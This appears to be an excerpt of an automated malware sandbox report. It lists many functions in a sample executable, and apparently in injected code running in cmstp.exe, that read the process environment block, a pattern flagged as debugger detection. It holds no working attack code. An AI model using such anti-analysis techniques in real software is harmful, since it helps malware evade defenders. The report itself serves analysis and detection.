          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A38A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A25210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A43A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ADB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ADB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A6927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AB4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ADD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AD8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AAA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A63D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AD3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A47D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A68EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ADFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ADFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A58E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A38794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04732073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04741074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04690050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04690050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04744015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04744015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
